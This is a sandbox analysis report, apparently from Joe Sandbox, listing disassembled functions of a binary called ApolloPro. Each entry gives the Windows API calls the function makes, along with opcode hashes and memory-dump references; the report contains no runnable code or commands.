                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 4cb99cc30f9d82bccb272ef8d003fcb985058b67ec429e43ab8bbb84604abc4c
                                                                                              • Instruction ID: 2fefb02a6a8662a04abbfd4c9d6935f61e539e6ca8e6278807206d687e75665b
                                                                                              • Opcode Fuzzy Hash: 4cb99cc30f9d82bccb272ef8d003fcb985058b67ec429e43ab8bbb84604abc4c
                                                                                              • Instruction Fuzzy Hash: B7115A39900218FFEB11EF95CD84EEDBBB9FB48710F204195EA00B7290D6716E11DBA4
                                                                                              Function 00632111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063214F
                                                                                              • GetStockObject.GDI32(00000011), ref: 00632163
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0063216D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3970641297-0
                                                                                              • Opcode ID: 73e6419af04a70904cdd4f4b17d7ed3dc07e96a3b38704ccec6dc38f2ce1f8db
                                                                                              • Instruction ID: f050b4a1f4ec5f25fd416543fd7ccad6dc46bdb0caba20787b31903778811a57
                                                                                              • Opcode Fuzzy Hash: 73e6419af04a70904cdd4f4b17d7ed3dc07e96a3b38704ccec6dc38f2ce1f8db
                                                                                              • Instruction Fuzzy Hash: DA118B7210120ABFEB024F94DD54EEABB6AEF59394F040116FB1452110C731DC61DBE0
                                                                                              Function 00691941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006904EC,?,0069153F,?,00008000), ref: 0069195E
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006904EC,?,0069153F,?,00008000), ref: 00691983
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006904EC,?,0069153F,?,00008000), ref: 0069198D
                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,006904EC,?,0069153F,?,00008000), ref: 006919C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                              • String ID:
                                                                                              • API String ID: 2875609808-0
                                                                                              • Opcode ID: 1dcc2bc386b8a9cf7e0bb2c65680d926076d980e2a5b0e914431d60fcd60e17d
                                                                                              • Instruction ID: 75eec5cf92826bce8bee4a31a07150822bab7f17ec8b9e90d53ab64c06aaf9e5
                                                                                              • Opcode Fuzzy Hash: 1dcc2bc386b8a9cf7e0bb2c65680d926076d980e2a5b0e914431d60fcd60e17d
                                                                                              • Instruction Fuzzy Hash: 25117C31C0061EDBDF009FE5D998AEEFB7AFF0A711F154055E984BA640CB3096508B91
                                                                                              Function 006BE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006BE1EA
                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 006BE201
                                                                                              • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 006BE216
                                                                                              • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 006BE234
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                                              • String ID:
                                                                                              • API String ID: 1352324309-0
                                                                                              • Opcode ID: c33513d650bcfb9aba533815e9ac42c300d2bc52b1ceefe502c450dc3072a64a
                                                                                              • Instruction ID: da0f9b21827de66dc411d8be87f45b0834bd6dc965d67e5872c9ba7bfccf8b26
                                                                                              • Opcode Fuzzy Hash: c33513d650bcfb9aba533815e9ac42c300d2bc52b1ceefe502c450dc3072a64a
                                                                                              • Instruction Fuzzy Hash: 96115EB5205304DBE3348F51DD09FE3BBFDEB00B04F108559A616D6150D7B1E6449BA1
                                                                                              Function 006671E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: 127b3e6ed1255af430f3021486b29f6a2b4f1cbc75a67a626460fdb5ea30595b
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: 09019E3204814EBBCF125F84CC11CEE3F6BBB19358F188519FA1898231C336CAB1AB81
                                                                                              Function 006BB937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 006BB956
                                                                                              • ScreenToClient.USER32(?,?), ref: 006BB96E
                                                                                              • ScreenToClient.USER32(?,?), ref: 006BB992
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006BB9AD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: 60029b3e1e22a7a741cae5d348f0980fd6793ba7a5685489c164aafb9671bfa8
                                                                                              • Instruction ID: d8ac28c3a7543d20f1cffe467c38088cca8bc0711f836d7fabbef464972f3883
                                                                                              • Opcode Fuzzy Hash: 60029b3e1e22a7a741cae5d348f0980fd6793ba7a5685489c164aafb9671bfa8
                                                                                              • Instruction Fuzzy Hash: 661163B9D00209EFDB41DF99C884AEEBBF9FB48310F105156E914E3210D731AA618F50
                                                                                              Function 006BBCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006BBCB6
                                                                                              • _memset.LIBCMT ref: 006BBCC5
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006F8F20,006F8F64), ref: 006BBCF4
                                                                                              • CloseHandle.KERNEL32 ref: 006BBD06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3277943733-0
                                                                                              • Opcode ID: 04328b1ae19724b70924e21cdb19545d6f5850c21a000eb9617ac0a18b35ecd2
                                                                                              • Instruction ID: ba0e1d0e64ea40e5371a93bd5b4a2600e85c38432bf8a606d1aff1eacda594f4
                                                                                              • Opcode Fuzzy Hash: 04328b1ae19724b70924e21cdb19545d6f5850c21a000eb9617ac0a18b35ecd2
                                                                                              • Instruction Fuzzy Hash: 16F05EB2541354BFF7502B65AC05FBB3A5FEB09795F001461BE08D61A2DB754810C7A8
                                                                                              Function 00697195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 006971A1
                                                                                                • Part of subcall function 00697C7F: _memset.LIBCMT ref: 00697CB4
                                                                                              • _memmove.LIBCMT ref: 006971C4
                                                                                              • _memset.LIBCMT ref: 006971D1
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 006971E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 48991266-0
                                                                                              • Opcode ID: 5ec371cd53a8060978f9effd7535467b43fff3ac43c259e13b109a1995626bbe
                                                                                              • Instruction ID: 330deb47f9e5ce50c2edbca5cf818a3999e54f3886426cefe9d73605840f1d4f
                                                                                              • Opcode Fuzzy Hash: 5ec371cd53a8060978f9effd7535467b43fff3ac43c259e13b109a1995626bbe
                                                                                              • Instruction Fuzzy Hash: A3F05E7A200100AFCF416F55DC85F5ABB2AEF45361F08C056FE089F26ACB31A915DBB8
                                                                                              Function 006BC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00631729
                                                                                                • Part of subcall function 006316CF: SelectObject.GDI32(?,00000000), ref: 00631738
                                                                                                • Part of subcall function 006316CF: BeginPath.GDI32(?), ref: 0063174F
                                                                                                • Part of subcall function 006316CF: SelectObject.GDI32(?,00000000), ref: 00631778
                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006BC3E8
                                                                                              • LineTo.GDI32(00000000,?,?), ref: 006BC3F5
                                                                                              • EndPath.GDI32(00000000), ref: 006BC405
                                                                                              • StrokePath.GDI32(00000000), ref: 006BC413
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                              • String ID:
                                                                                              • API String ID: 1539411459-0
                                                                                              • Opcode ID: 74bda57924d0dd4cb46cdd7723d52a83c63aff5bd9835889358f72f4d579e4f6
                                                                                              • Instruction ID: 82483f6657572afc98c7b442337d7f95a671c8d87fde7d9e5afbf8f16441830b
                                                                                              • Opcode Fuzzy Hash: 74bda57924d0dd4cb46cdd7723d52a83c63aff5bd9835889358f72f4d579e4f6
                                                                                              • Instruction Fuzzy Hash: B7F0BE31105268FAEB122F94AC0EFEE3F9BAF06321F048000FA11211E1C3741A60DBA9
                                                                                              Function 0068AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0068AA6F
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0068AA82
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0068AA89
                                                                                              • AttachThreadInput.USER32(00000000), ref: 0068AA90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2710830443-0
                                                                                              • Opcode ID: 8349c6c304633def94deb4201e556295e083e1bfa9c6348bfdf9e29d94a640d2
                                                                                              • Instruction ID: d47fa91330bfc43f3291b4a77f70df3a45effeb6729c0b35773c29cf0f2c7cc5
                                                                                              • Opcode Fuzzy Hash: 8349c6c304633def94deb4201e556295e083e1bfa9c6348bfdf9e29d94a640d2
                                                                                              • Instruction Fuzzy Hash: 80E03931541228BAFB216FA29D0CEE77F2EEF117A1F048112F90984450C6718550CBA0
                                                                                              Function 006325F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 0063260D
                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00632617
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0063262C
                                                                                              • GetStockObject.GDI32(00000005), ref: 00632634
                                                                                              • GetWindowDC.USER32(?,00000000), ref: 0066C1C4
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0066C1D1
                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0066C1EA
                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0066C203
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0066C223
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0066C22E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1946975507-0
                                                                                              • Opcode ID: ff7b958b2a12bf7d17bc973ba8c9e4cfa111ec6b5f0afaee76abb403851206f7
                                                                                              • Instruction ID: 7143c02162df08dd05bf72ef29351e552d8eb8ba11be4d6410808fa07edee22c
                                                                                              • Opcode Fuzzy Hash: ff7b958b2a12bf7d17bc973ba8c9e4cfa111ec6b5f0afaee76abb403851206f7
                                                                                              • Instruction Fuzzy Hash: B6E0ED31504644FBEB215FA8AC4DFF87B16EB16332F188366FAA9980E187714A90DB11
                                                                                              Function 00689330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 00689339
                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00688F04), ref: 00689340
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00688F04), ref: 0068934D
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00688F04), ref: 00689354
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                              • String ID:
                                                                                              • API String ID: 3974789173-0
                                                                                              • Opcode ID: 433fdd5dd207fd1297b0833d143739a42a8b9f6180a972e1d775e68eccd19119
                                                                                              • Instruction ID: 31f3aeccdd478a27dbc00fa8b6bb2744f49a400693fc91ddbf1688f23545b65e
                                                                                              • Opcode Fuzzy Hash: 433fdd5dd207fd1297b0833d143739a42a8b9f6180a972e1d775e68eccd19119
                                                                                              • Instruction Fuzzy Hash: 67E08636701211DFE7202FB15D0DFB63B6EEF54791F154818B346CA090E6349444D760
                                                                                              Function 00670679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00670679
                                                                                              • GetDC.USER32(00000000), ref: 00670683
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006706A3
                                                                                              • ReleaseDC.USER32(?), ref: 006706C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 295192089f4bc50b7b8291f065f40e57407d521e5de8764e826b3fd74a0a22e2
                                                                                              • Instruction ID: 3301782b1f063964bca5e20fc7d576e67a5e38b3baa256bccc55bfe486bd5f67
                                                                                              • Opcode Fuzzy Hash: 295192089f4bc50b7b8291f065f40e57407d521e5de8764e826b3fd74a0a22e2
                                                                                              • Instruction Fuzzy Hash: 87E0EEB1800204EFEB419FA1D808AADBBB2EB88310F119009F85AA7210CB3895529F90
                                                                                              Function 0067068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 0067068D
                                                                                              • GetDC.USER32(00000000), ref: 00670697
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006706A3
                                                                                              • ReleaseDC.USER32(?), ref: 006706C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 4eb7bfcb4bf04b17f816f3f5f84d813b910a38c0ea655e17c3d52e2ea560d711
                                                                                              • Instruction ID: 0168eb0755db6b908bcffb63b69622a77582f674400e40b185de65b2f9fd8539
                                                                                              • Opcode Fuzzy Hash: 4eb7bfcb4bf04b17f816f3f5f84d813b910a38c0ea655e17c3d52e2ea560d711
                                                                                              • Instruction Fuzzy Hash: B6E012B1800204EFEF519FA1D80CAADBBF2EF8C310F118008F95AA7210CB38A5528F90
                                                                                              Function 0069B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0064436A: _wcscpy.LIBCMT ref: 0064438D
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • __wcsnicmp.LIBCMT ref: 0069B670
                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0069B739
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                              • String ID: LPT
                                                                                              • API String ID: 3222508074-1350329615
                                                                                              • Opcode ID: ed546855bd743c874d5734d055f4555c818609e18841567a5af4a4ba6f5186ef
                                                                                              • Instruction ID: 355565cd15ceafad8e1187de098b102893f7385ff9bb0ceb29642ae51f100ccd
                                                                                              • Opcode Fuzzy Hash: ed546855bd743c874d5734d055f4555c818609e18841567a5af4a4ba6f5186ef
                                                                                              • Instruction Fuzzy Hash: 03619F75A00219AFCF14DF94D981EEEB7BAEF48710F108159F806AB791DB30AE41CB94
                                                                                              Function 00677190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
